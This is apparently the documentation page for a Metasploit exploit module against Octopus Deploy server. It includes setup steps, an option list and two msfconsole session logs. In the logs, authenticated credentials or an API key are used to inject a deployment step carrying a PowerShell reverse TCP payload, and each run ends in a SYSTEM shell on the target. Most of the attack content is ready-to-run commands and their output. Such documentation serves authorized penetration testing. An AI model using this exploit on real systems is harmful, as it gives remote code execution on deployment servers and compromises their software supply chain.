dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md

5.0 KiB
Raw Permalink Blame History

Vulnerable Application

Install Octopus Deploy server

Create a test user/team - Team should have "Project contributor" and "Project deployer", or just "System administrator" and add your test user.

Create an API key

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/http/octopusdeploy_deploy
  4. Do: set PATH, RHOST, RPORT, and SSL if needed
  5. Do: set STEPNAME if desired
  6. Do: set USERNAME and PASSWORD or just APIKEY
  7. Do: run
  8. You should get a shell.

Options

APIKEY

API key, which can be generated within the Octopus Deploy application. Can be used instead of a username/password combination.

USERNAME

Username of the Octopus Deploy user.

PASSWORD

Password of the Octopus Deploy user.

PATH

Path to the Octopus Deploy instance. For example, if you sign in to "https://example.com/octopus/app", the value should be "/octopus".

STEPNAME

Name of the step to be added to a deployment. This may be visible in the application for a short period of time. A random value will be generated if no value is provided.

SSL

Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.

Scenarios

Octopus Deploy Server 3.16.0

Getting a privileged shell on Octopus Deploy server using administrative credentials.

msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set USERNAME ODUser
USERNAME => ODUser
msf exploit(octopusdeploy_deploy) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step r4XAJc to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.2
[*] Creating release
[*] Release Releases-79 created
[*] Deploying TestProject2 version 0.0.2 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step r4XAJc from TestProject2
[*] Step r4XAJc deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59346) at 2017-05-15 19:54:01 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025358-22>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025358-22> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) >

Getting a privileged shell on Octopus Deploy server using a sufficiently privileged API key.

msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > set APIKEY API-FCIQ773M43RKNC4I9KZHQTABC
APIKEY => API-FCIQ773M43RKNC4I9KZHQTABC
msf exploit(octopusdeploy_deploy) > set STEPNAME shell
STEPNAME => shell
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step shell to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-80 created
[*] Deploying TestProject2 version 0.0.3 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step shell from TestProject2
[*] Step shell deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59373) at 2017-05-15 19:59:55 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025952-24>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025952-24> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) >